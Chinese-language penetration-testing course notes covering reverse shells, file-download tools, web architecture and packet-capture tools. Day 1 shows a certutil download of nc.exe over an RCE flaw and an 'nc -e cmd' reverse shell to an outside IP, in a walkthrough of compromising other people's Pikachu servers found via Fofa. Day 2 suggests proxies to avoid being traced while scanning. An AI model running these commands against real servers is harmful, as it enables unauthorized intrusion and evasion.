第1天:基础入门-操作系统&名词&文件下载&反弹SHELL&防火墙
知识点:
1.渗透测试常用术语总结 POC、EXP、Payload、Shellcode等概念
2.操作系统-用途&命令&权限&用户(组)&防火墙等概念
3.个人计算机&服务器用机:windows2016、2012多为服务器
5.文件权限&服务权限&用户权限等
6.系统用户&用户组&服务用户等分类
7.自带防火墙出站&入站规则策略协议:入站严格,出站宽松(所以要反弹shell) WAF:web应用防火墙
实践:
1.文件上传下载-解决无图形化&解决数据传输(文件下载:将外网的一个东西下载到本地)
Linux: wget curl python ruby perl java等
Windows: PowerShell Certutil Bitsadmin msiexec mshta rundll32等
棱角社区:[~]#棱角 ::Edge.Forum* (提供反弹shell、文件下载、在线编码工具等)
2.反弹Shell命令-解决数据回显&解决数据通讯
控制别的电脑时,要将信息回显到自己的电脑上;进一步,当遇到需要输密码这种交互式的场景时,就需要反弹shell
3.防火墙绕过-正向连接&反向连接&内网服务器
1、内网:
内网->xiaodi8:可行,因为外网ip唯一
xiaodi8!->内网:不可行,因为内网的ip是各处通用的,即使找到网关,也无法转发,除非加上端口映射
2、防火墙:
xiaodi8 <-aliyun
xiaodi8防火墙->aliyun
a1iyun!->xiaodi8防火墙
(防火墙具有出站规则宽松,入站规则严格的特性,利用这条特性将内网服务器通过反弹shell将权限赋予给监听主机)
3、本机wsl上实现
linux ip addr查看ip,inet 172.18.100.188/20 brd 172.18.111.255 scope global eth0,ip为172.18.100.188
linux监听端口,nc -lvvp 8888
windows传shell,nc -nv 172.18.100.188 8888
Windows输入字符,回车,在linux上也显示
4.学会了有手就行-Fofa拿下同行Pikachu服务器 文件下载&反弹shell:
1、通过fofa收集pikachu靶场 2、测试是否存在rce漏洞 ping 127.0.0.1 & dir查看返回信息是否含有命令执行后的内容 3、远程命令执行下载 nc.exe:certutil.exe -urlcache -split -f http://www.xiaodi8.com:8888/nc.exe n.exe 4、本地NC监听开启后,使用远程命令执行反弹shell到本地服务器:nc -e cmd 47.75.212.155 5566
利用漏洞给服务器安装nc,让服务器把shell主动弹给监听机
环境变量恢复默认:%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0;%SYSTEMROOT%\System32\OpenSSH\
第2天:基础入门-Web应用&架构搭建&漏洞&HTTP数据包&代理服务器
知识点:
1.网站搭建前置知识 :域名,子域名,DNS,HTTP/HTTPS,证书等
2.WEB应用环境架构类 理解不同WEB应用组成角色功能架构: 开发语言,程序源码,中间件容器,数据库类型,服务器操作系统,第三方软件等 开发语言:asp,php,aspx,jsp,java,python,ruby,go,html,javascripts等 程序源码:根据开发语言分类;应用类型分类;开源CMS分类;开发框架分类等 中间件容器:IIS,Apache,Nginx,Tomcat,Weblogic,Jboos,glasshfish等 数据库类型:Access,Mysql,Mssql,Oracle,db2,Sysbase,Redis,MongoDB等 服务器操作系统:Windows系列,Linux系列,Mac系列等 第三方软件:phpmyadmin,vs-ftpd,VNc,ElK,Openssh等
3.WEB应用安全漏洞分类 SQL注入,文件安全,RCE执行,XSS跨站,CSRE/SSRE/CRLE,反序列化,逻辑越权,未授权访问,XE/XL,弱口令安全等
4.WEB请求返回过程数据包 WEB请求处理一:浏览器请求发起处理 HTTP协议数据包简单总结
请求数据包,请求方法,请求体,响应包,响应头,状态码,代理服务器等 Request,Response,User-Agent,Cookie,Server,Content-Length
实践:
1.架构-Web应用搭建-域名源码解析(阿里云服务器购买、使用及宝塔部署网站)
2.请求包新闻回帖点赞重放数据包(新浪论坛使用bp重发数据包实现)
3.请求包-移动端&PC访问-自定义UA头(请求包中user-agent不同导致)
4.返回包-网站文件目录扫描-返回状态码(根据返回码可以判断资源是否存在。)HTTP状态码汇总
5.数据包-WAF文件目录扫描-代理服务器(使用远程代理可以避免扫描目录时地址被封禁、被溯源)快代理
6.git安装详解:Git 详细安装教程
第3天:基础入门-抓包&封包&协议&APP&小程序&PC应用&WEB应用
知识点:
1、抓包技术应用意义(通过抓包工具,获取app封装的域名,进行渗透测试)
2、抓包技术应用对象(小程序、APP、PC应用)
3、抓包技术应用协议(http/https协议,不使用的应用可以通过全局代理抓包)
4、抓包技术应用支持
5、封包技术应用意义(零散和整体的区别,封包能精确到每个操作的数据包)
总结点:学会不同对象采用不同抓包封包抓取技术分析
基于网络接口抓包-网络接口 基于程序进程抓包-程序进程 基于数据协议抓包-HTTP/S&TCP&UDP 基于应用对象抓包-APP&小程序&PCUI 基于系统使用抓包-模拟器&WIN&LINUX
抓包工具:
Fiddder: 是一个http协议调试代理工具,它能够记录并检查所有你的电脑和互联网之间的http通讯,设置断点,查看所有的"进出"Fiddler的数据(指cookie,html,j3,css等文件)。Fiddler要比其他的网络调试器要更加简单,因为它不仅仅暴露ttp通讯还提供了一个用户友好的格式。
Charles: 是一个HTTP代理服务器,HTTP监视器,反转代理服务器,当浏览器连接Charles的代理访问互联网时,char1es可以监控浏览器发送和接收的所有数据。它允许一个开发者查看所有连接互联网的HTTP通信,这些包括cequest,respon3e和HTTP headers(包含cookies.与caching信息)
TCPDump: 是可以将网络中传送的数据包完全截获下来提供分析。它支持针对网络层、协议、主机、网络或端口的过滤,并提供and、or、not等逻辑语句来帮助你去掉无用的信息。
BurpSuite: 是用于攻击web应用程序的集成平台,包含了许多工具。Burp Suitei为这些工具设计了许多接口,以加快攻击应用程序的过程。所有工具都共享一个请求,并能处理对应的HTTP消息、持久性、认证、代理、日志、警报。
Wireshark: 是一个网络封包分析软件。网络封包分析软件的功能是截取网络封包,并尽可能显示出最为详细的网络封包资料。Wireshark使用WinPCAP作为接口,直接与网卡进行数据报文交换。
科来网络分析系统:是一款由科来软件全自主研发,并拥有全部知识产品的网络分析产品。该系统具有行业领先的专家分析技术,通过捕获并分析网络中传输的底层数据包,对网络故障、网络安全以及网络性能进行全面分析,从而快速排查网络中出现或潜在的故 障、安全及性能问题。
WPE&封包分析:是强大的网络封包编辑器,wpe可以截取网络上的信息,修改封包数据是外挂制作的常用工具。一般在安全测试中可用来调试数据通讯地址。
实践:
1.WEB应用站点操作数据抓包-浏览器审查查看元素网络监听
2.APP&小程序&PC抓包HTTP/S数据-Charles&Fiddler&Burpsuite
3.程序进程&网络接口&其他协议抓包-WireShark&科来网络分析系统
4.通讯类应用封包分析发送接收-WPE四件套封包&科来网络分析系统(不使用web协议的流量通过WPE封包)
5.安卓模拟器安装搭建 逍遥,雷电,夜神等自行百度下载安装
6.工具相关证书安装指南 Charles: Charles证书安装(手机模拟器)_全黏胶是全棉吗-CSDN博客 Fidder https://blog.csdn.net/weixin45043349/article/details/120088449 BurpSuite: https://blog.csdn.net/qq/36658099/article/details/81487491
7.封包抓取调试见课程操作(通过傻瓜封包监听工具,实现发送历史数据包执行历史操作)
